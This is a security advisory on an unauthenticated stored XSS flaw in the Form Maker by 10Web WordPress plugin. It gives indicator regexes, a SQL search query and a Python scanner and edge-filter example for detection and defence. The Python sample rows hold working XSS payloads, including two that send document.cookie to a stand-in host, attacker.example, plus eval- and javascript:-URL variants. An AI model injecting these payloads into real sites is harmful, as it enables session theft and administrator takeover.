| Plugin Name | Form Maker by 10Web |
|---|---|
| Type of Vulnerability | Cross-Site Scripting (XSS) |
| CVE Number | CVE-2026-1058 |
| Urgency | Medium |
| CVE Publish Date | 2026-02-08 |
| Source URL | CVE-2026-1058 |
Urgent Security Advisory — Unauthenticated Stored XSS in Form Maker by 10Web (≤ 1.15.35)
Summary: A stored, unauthenticated Cross‑Site Scripting (XSS) vulnerability (CVE‑2026‑1058) affects Form Maker by 10Web plugin versions ≤ 1.15.35. The vendor released 1.15.36 to address the issue. This advisory provides detection, mitigation, and remediation steps — plus immediate virtual patching guidance you can apply via a WAF or equivalent edge filter.
Executive summary
On 6 February 2026 a stored XSS vulnerability was disclosed in the Form Maker by 10Web WordPress plugin (CVE‑2026‑1058). Versions up to and including 1.15.35 are affected. The vendor released version 1.15.36 to address the flaw.
- Vulnerability type: Stored Cross‑Site Scripting (XSS)
- Affected versions: ≤ 1.15.35
- Fixed in: 1.15.36
- CVE: CVE‑2026‑1058
- CVSS base score: 7.1 (listed as Medium urgency above; practical severity is High wherever stored submissions are rendered to an administrator)
- Attack vector: Unauthenticated, stored
- Impact: Session theft, privilege escalation (if payload executes in admin context), arbitrary JavaScript execution, unauthorized actions
Because the vulnerability is unauthenticated and involves stored content, it can be weaponised to affect administrators, content editors, or site visitors depending on rendering context. Treat any production or staging site using Form Maker as high priority for remediation.
How this vulnerability works (technical overview)
The plugin accepted and persisted form-submitted data (including hidden fields) without proper sanitisation/escaping before rendering it in admin or frontend views. When that stored content is displayed unescaped, a JavaScript payload executes in the viewer’s browser.
Typical attack flow:
- Attacker submits a form whose hidden field value carries a JavaScript payload (a script tag or an event-handler attribute on an HTML element), which is trivial because hidden fields are under the client's control.
- The plugin stores the payload in the database alongside the submission.
- When an administrator or other user opens the submissions list, preview, or any detail view that renders the stored hidden field value unescaped, the payload executes in the user’s browser context.
- Consequences include session cookie theft, CSRF-style actions executed under admin sessions, persistent malicious content insertion, or pivoting to a full site compromise.
Because no authentication is required to submit the form, an attacker can inject payloads at scale and wait for legitimate viewing to trigger execution.
Realistic exploitation scenarios
- Social engineering: Multiple malicious submissions followed by a targeted phishing message to lure an admin to the submissions list.
- Automated mass attack: Botnets scan for sites with the plugin, enumerate public forms, and inject payloads into hidden fields en masse.
- Public posts: If submissions are displayed publicly (testimonials, reviews), any visitor could trigger the stored payload.
The gravest outcome is payload execution in an admin context — this can enable account takeover, creation of backdoors, or modifications to themes/plugins.
Indicators of compromise (IoCs) to look for
Search your site and database for injected scripts or suspicious content. Start with these places:
- The plugin's own submission tables under your table prefix, which hold the stored hidden-field values directly
- wp_posts, wp_postmeta, wp_comments and wp_options, for stored HTML that was copied, exported or rendered from submissions
Patterns to search for (all case-insensitive):
- Event handlers: `(?i)on\w+\s*=\s*["']?[^"'>]+["']?`
- javascript: URLs: `(?i)javascript:`
- data: URLs: `(?i)data:text/html`
- Encoded or obfuscated payloads: `%3Cscript%3E`, `\x3cscript\x3e`, `eval\(`, `document\.cookie`, `new Image\(`
Example search (MySQL and MariaDB REGEXP is already case-insensitive for non-binary columns, so the `(?i)` prefix is dropped; apply the same WHERE clause to the plugin's submission table):
```sql
SELECT meta_id, post_id, meta_key, LEFT(meta_value, 200) AS sample
FROM wp_postmeta
WHERE meta_value REGEXP '<script|javascript:|on[a-z]+[[:space:]]*=|data:text/html|%3Cscript%3E|document\\.cookie|new Image\\(';
```
How WAF and virtual patching help — practical benefits
Deploying a WAF or equivalent edge filter provides several immediate benefits while you prepare or apply the vendor patch:
- Block exploit traffic that matches known XSS payload patterns (decode URL and HTML encoding before matching, otherwise the encoded variants listed in the IoC section slip past the rules).
- Rate-limit and challenge high-volume automated submissions.
- Detect and log attempted exploitation for forensic analysis.
- Provide temporary virtual patching while you update the plugin.
For organisations managing many sites, centralised rule application via a capable edge filter or WAF simplifies coordination of emergency mitigations.
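The following is an added example, not code from the advisory or from 10Web, that serves both the IoC hunt above and the edge filtering described in this section. It normalises the encodings attackers use (URL, HTML entity, `\xNN`), applies the indicator patterns from the IoC list to constructed sample submission rows, and models the virtual patch as a small request filter that blocks payload-bearing fields, challenges noisy clients and keeps a log. The row shape `(id, form_id, element_label, element_value)`, the `EdgeFilter` class and the sample rows are assumptions for this example, not the plugin's schema or any WAF's API.

```python
import html
import re
import time
from collections import defaultdict
from urllib.parse import unquote

# Indicator patterns from the advisory's IoC list (case-insensitive), plus a
# <script marker, which is the most common stored-XSS indicator.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon\w+\s*=\s*[\"']?[^\"'>]+[\"']?", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "data_html_url": re.compile(r"data:text/html", re.I),
    "js_sink": re.compile(r"eval\(|document\.cookie|new Image\(", re.I),
}


def normalize(value, rounds=3):
    """Undo the encodings used to hide payloads from naive pattern matching:
    URL encoding (%3Cscript%3E), HTML entities (&lt;script&gt;) and \\xNN
    escapes (\\x3cscript\\x3e). Several rounds handle double encoding."""
    out = value
    for _ in range(rounds):
        before = out
        out = unquote(out)
        out = html.unescape(out)
        out = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), out)
        if out == before:
            break
    return out


def find_indicators(value):
    """Names of the indicator patterns that match the decoded value."""
    decoded = normalize(value)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def render_safely(value):
    """Output escaping, the real fix on the rendering side: a stored payload is
    shown as inert text. The WordPress equivalents are esc_html()/esc_attr()."""
    return html.escape(value, quote=True)


# Constructed sample rows, shaped (id, form_id, element_label, element_value).
# The shape is an assumption for this example, not the plugin's actual schema.
SAMPLE_ROWS = [
    (1, 7, "email", "alice@example.com"),
    (2, 7, "hidden_ref", "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"),
    (3, 7, "hidden_ref", "%3Cscript%3Eeval(atob('YWxlcnQoMSk='))%3C%2Fscript%3E"),
    (4, 7, "message", "Please call me on Monday"),
    (5, 7, "hidden_ref", "<img src=x onerror=\"fetch('//attacker.example/'+document.cookie)\">"),
    (6, 7, "website", "javascript:alert(document.domain)"),
    (7, 7, "hidden_ref", "\\x3cscript\\x3ealert(document.domain)\\x3c/script\\x3e"),
]


def scan_submissions(rows):
    """Forensic pass over stored submissions: (row_id, label, indicators) per hit."""
    hits = []
    for row_id, _form_id, label, value in rows:
        names = find_indicators(value)
        if names:
            hits.append((row_id, label, names))
    return hits


class EdgeFilter:
    """Hypothetical model of the virtual patch: inspect form POSTs before the
    plugin stores them, block payload-bearing fields, challenge noisy clients,
    and log every decision for later forensics."""

    def __init__(self, max_per_window=5, window_seconds=60):
        self.max_per_window = max_per_window
        self.window = window_seconds
        self.seen = defaultdict(list)  # client IP -> submission timestamps
        self.log = []                  # (time, ip, action, detail)

    def inspect(self, client_ip, fields, now=None):
        now = time.time() if now is None else now
        stamps = [t for t in self.seen[client_ip] if now - t < self.window]
        stamps.append(now)
        self.seen[client_ip] = stamps
        if len(stamps) > self.max_per_window:
            self.log.append((now, client_ip, "rate_limited", None))
            return "challenge"  # hand off to a CAPTCHA or JS challenge at the edge
        for name, value in fields.items():
            found = find_indicators(value)
            if found:
                self.log.append((now, client_ip, "blocked", (name, found)))
                return "block"
        self.log.append((now, client_ip, "allowed", None))
        return "allow"


if __name__ == "__main__":
    for row_id, label, names in scan_submissions(SAMPLE_ROWS):
        print(f"row {row_id} field {label!r}: {', '.join(names)}")
    waf = EdgeFilter(max_per_window=3)
    print(waf.inspect("203.0.113.5", {"hidden_ref": SAMPLE_ROWS[2][3]}, now=0.0))
```

Two design points matter in practice: decoding happens before matching, so the `%3Cscript%3E` and `\x3c` variants are caught by the same rules as the plain ones; and the filter is a stopgap, so the block also shows output escaping (`render_safely`), which is what actually removes the vulnerability once the plugin is updated.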